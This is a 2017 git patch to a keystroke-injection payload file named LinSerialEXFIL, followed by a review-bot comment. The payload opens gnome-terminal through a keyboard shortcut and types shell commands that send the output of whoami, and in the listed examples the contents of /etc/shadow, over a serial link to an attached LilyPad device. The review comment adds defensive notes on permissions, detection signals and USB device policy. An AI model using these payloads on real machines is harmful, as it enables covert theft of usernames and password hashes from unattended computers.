From d8e90f2f70fd7be548a9b16e61b2078cb667adeb Mon Sep 17 00:00:00 2001
From: Corey Harding
Date: Sat, 28 Oct 2017 20:07:29 -0400
Subject: [PATCH] Update Payload LinSerialEXFIL
---
 payloads/LinSerialEXFIL.txt | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)
diff --git a/payloads/LinSerialEXFIL.txt b/payloads/LinSerialEXFIL.txt
index 6ad3700..5bd0f15 100644
--- a/payloads/LinSerialEXFIL.txt
+++ b/payloads/LinSerialEXFIL.txt
@@ -1,13 +1,15 @@
 Rem: Exfiltrate UserName from Linux Box using a Serial Link
-DefaultDelay:1000
+DefaultDelay:50
 Press:134+195
+CustomDelay:1000
 PrintLine:gnome-terminal
 CustomDelay:1000
-Rem: Exfiltrate Username then BlinkLED:3 to signal when done exfiltrating data
-PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(whoami) > /dev/serial/by-id/*LilyPad*;echo "BlinkLED:3" > /dev/serial/by-id/*LilyPad* &
+Rem: Exfiltrate User and BlinkLED:3 when done
+PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(whoami)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad*
+Rem: -
 Rem: More examples below
 Rem: PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(whoami) > /dev/serial/by-id/*LilyPad*
-Rem: In example below replace "LINUX COMMAND HERE": PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(LINUX COMMAND HERE) > /dev/serial/by-id/*LilyPad*
-Rem: Dump shadow file: stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(cat /etc/shadow) > /dev/serial/by-id/*LilyPad*
+Rem: In example below replace "LINUX COMMAND HERE": PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(LINUX COMMAND HERE)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad*
+Rem: Dump shadow file: PrintLine:stty -F /dev/serial/by-id/*LilyPad* 38400;sleep .5;echo -e "SerialEXFIL:"$(cat /etc/shadow)"\nBlinkLED:3" > /dev/serial/by-id/*LilyPad*
 Rem: Dump shadow file for current user: stty -F /dev/serial/by-id/*LilyPad* 38400;echo "SerialEXFIL:"$(cat /etc/shadow|grep $(whoami)) > /dev/serial/by-id/*LilyPad*
 Rem: Another way to access device: PrintLine:stty -F /dev/ttyACM0 38400;echo "SerialEXFIL:"$(whoami) > /dev/ttyACM0
\ No newline at end of file
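Review bot: The rewritten `Rem:` examples (the main `PrintLine:` and the two "Dump shadow file" lines) state no preconditions, so the file does not say which host controls decide whether the payload produces anything. A comment such as `Rem: Needs write access to the serial device node; the /etc/shadow examples need root` would document that. Those two permissions are also the controls a defender relies on: /etc/shadow is normally readable by root only, and serial device nodes are usually restricted to a dedicated group. The sequence visible in the hunk (a keyboard shortcut, `gnome-terminal`, then a shell running `stty -F` and redirecting into `/dev/serial/by-id/*LilyPad*` or `/dev/ttyACM0`) is the observable behaviour to alert on. The device presumably enumerates as a keyboard plus a CDC-ACM serial interface, which a USB device authorisation policy (for example USBGuard) can refuse before any keystroke is accepted.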